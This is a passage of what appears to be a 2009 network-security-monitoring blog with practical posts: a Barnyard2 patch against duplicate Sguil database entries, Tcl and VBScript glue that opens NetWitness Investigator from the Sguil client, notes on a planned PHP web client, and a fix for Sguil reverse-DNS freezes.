So this lead us to inspect src/spooler.c which lead us to src/plugbase.c CallOutputPlugins() function. While reviewing it, we notice that if the OUTPUT_TYPE__SPECIAL (which Sguil is) is set, then it will process idx-func() once for the entry in the AlertList and once for the LogList:

void CallOutputPlugins(OutputType out_type, Packet *packet, void *event, uint32_t event_type)
{
    OutputFuncNode *idx = NULL;

    if (out_type == OUTPUT_TYPE__SPECIAL)
    {
        idx = AlertList;
        while (idx != NULL)
        {
            idx->func(packet, event, event_type, idx->arg);
            idx = idx->next;
        }

        idx = LogList;
        while (idx != NULL)
        {
            idx->func(packet, event, event_type, idx->arg);
            idx = idx->next;
        }
    }

So if we remove the processing the second time around for the LogList, we are able to stop the double entries from being created in the database. Below is what the patch (which you can download here) looks like. Obviously, you can just delete the lines with the single minus sign in front of them that are located within the CallOutputPlugins() function of src/plugbase.c:

--- plugbase.c  2009-10-17 06:08:55.000000000 -0400
+++ plugbase.c.new      2009-12-11 21:59:22.000000000 -0500
@@ -543,13 +543,6 @@
                idx->func(packet, event, event_type, idx->arg);
                idx = idx->next;
        }
-
-        idx = LogList;
-       while (idx != NULL)
-       {
-               idx->func(packet, event, event_type, idx->arg);
-               idx = idx->next;
-       }
     }
     else
     {

To apply the patch, move it to the src/ directory within the Barnyard2 v 1.7 distribution directory and perform the following then compile/install as normal:

#patch plugbase.c < plugbase.c.patch

Additional things we discovered during the troubleshooting process were how to enable the debugging within Barnyard2. You must first compile it with the --enable-debug option, then prior to running it you must set the environment variable BARNYARD2_DEBUG to one of the numbers listed in src/debug.h (if you want everything, and that IS a lot, just do export BARNYARD2_DEBUG=4294967295).

Integrating NetWitness and Sguil – Take One

Eoin Miller — Tue, 08 Dec 2009 10:41:25 +0000

We will be deploying NetWitness soon and we have been looking for how to leverage it for the packet capture portion of our new centralized Sguil deployment instead of sancp or daemonlogger. We have come up with a way, all be it a bit hackish, of modifying the Sguil client to allow you to view the pcap/session data from within NetWitness Investigator.

First, we modified client/sguil.tk and added the following line under the following line underneath the section of code notated by the comment # Xscript Menu:

$eventIDMenut add command -label "NetWitness" -command "NetWitness"

This will provide us with a NetWitness menu option where you normally see your Wireshark and Get Transcript options within the Sguil client:

Now that we have that, we need code that will do something when this option is selected. For that we need to add the following to the end of the client/lib/extdata.tcl file:

proc NetWitness { } {
    global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
    global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
    if {!$ACTIVE_EVENT} {return}
    set selectedIndex [$CUR_SEL_PANE(name) curselection]
    set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
    set cnxID [lindex $sidcidList 1]
    set sensorID [lindex $sidcidList 0]
    set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]

    set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
    set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
    set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
    set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
    if { $CUR_SEL_PANE(format) == "SSN" } {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
    } else {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
    }

    exec wscript c:/users/user/test.vbs "nw://test?collection=test&time=All+Data&more-states=&more-all-states=&name=$srcIP+%3E+$dstIP+%3A+$dstPort&where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP+%26%26+tcp.dstport%3D$dstPort&view=session"
}

Now you will notice at the second to last line we are executing a vbscript called test.vbs in c:\users\user\. The contents of that file are as follows (and yes, all those quotes are necessary as you escape a quote with another quote when writing vbscript):

Set objShell = Wscript.CreateObject("Wscript.Shell")
Set ArgObj = WScript.Arguments

Cmd = """" & "c:\windows\system32\explorer.exe" & """" & " " & """" & WScript.Arguments.Item(0) & """"

objShell.Run Cmd

When this gets executed, it will have the NetWitness url (nw://) with the source ip, destination ip and destination port, passed to the Windows shell (explorer.exe). We will be going back and adding time into the mix as well once our actual NetWitness deployment is up and running. We are currently just testing and demonstrating for proof of concept using the free version of NetWitness Investigator 9:

Now, this definately does not seem like the most direct or correct way to do this. However, we discovered some odd behavior that lead us down this path. If you attempt to pass the URL directly to the NwInvestigator.exe binary, it will crash it. If you attempt to pass the URL directly to explorer.exe from within the TCL script, it only opens up explorer but it does not open up NetWitness Investigator. I believe it has something to do with the quoted arguments and how they are passed, but I could not fix it as I know little of TCL and even less about how it works on Windows.

jSguil

Eoin Miller — Tue, 01 Dec 2009 13:32:18 +0000

We really do love Sguil, but the client and server lack a few desirable things. As far as I can tell, there is only one SQL connection shared between the server and all the clients connecting to it. Obviously if someone runs a SANCP query that is a little over the top, until it comes back everyone else cannot query the database. This would make sense as the Sguil server requires the non-threaded version of TCL to work. LAMP based applications don’t run into this single connection for all users bottleneck as Apache and MySQL are multithreaded and each request will create its own (or multiple) database connection for the POST/GET and then close it on completion. I already knew about SQuerT, but it lacks a few things, such as an authentication mechanism. There also is a web client directly associated with the Sguil project, but it was never fully completed and most of the application is a mock up. Lastly, the current Sguil clients will not be that easy to integrate with our upcoming NetWitness deployment. The combination of which, should be quite awesome.

So I have decided to start developing, what I am calling for now, jSguil. It will be along the lines of SQuerT in that it is not to be a function for function replacement for the standard TCL Sguil client. This basically gives me an excuse to actually buckle down and learn JSON/jQuery/webtwodotoh. It will be written in PHP and utilize jQuery/jqgrid. Development so far has been slow and painful as I continiously learn how to actually write PHP/JavaScript (sort of). It end up with me having to redo the entire thing I just spent two hours on due to discovering how to do something in a much better manner. Below is a screenshot of just the SANCP queries you can run. You can sort the results of each column by clicking on it. You may also notice the data is paginated and is currently allowing you to view 50/200/500 records at a time. Every time you sort or get a new page, another query is executed for only the number of records you have chosen to display. This keeps the response times quite fast, even on large resultsets.

Sguil Client Reverse DNS Causes Client To Freeze?

Eoin Miller — Fri, 27 Nov 2009 11:12:22 +0000

If you have ever tried to use the Sguil client’s reverse DNS under the IP Resoluation tab and noticed that it caused the application to be unresponsive, here is the reason why. Tcl uses TCP for DNS by default. So if your DNS server does not allow TCP DNS, the client just sits there endlessly attempting to create the TCP socket connection everytime it tries to do a gehostbyaddress(). You can review the configuration by doing the following inside of tclsh:

# tclsh % package require dns 1.3.2 % dns::configure -loglevel warn -nameserver 192.168.1.1 -port 53 -protocol tcp -search {} -timeout 30000

If you want the client to do UDP DNS queries, you have to ensure you have the tcludp package installed. With Ubuntu, the package is named libudp-tcl. So the following should get you Ubuntu guys where you need to go:

# apt-get install libudp-tcl # tclsh % package require dns 1.3.2 % dns::configure -loglevel warn -nameserver 192.168.1.1 -port 53 -protocol udp -search {} -timeout 30000

Or, alternatively, you can always just open up 53/TCP on your DNS server.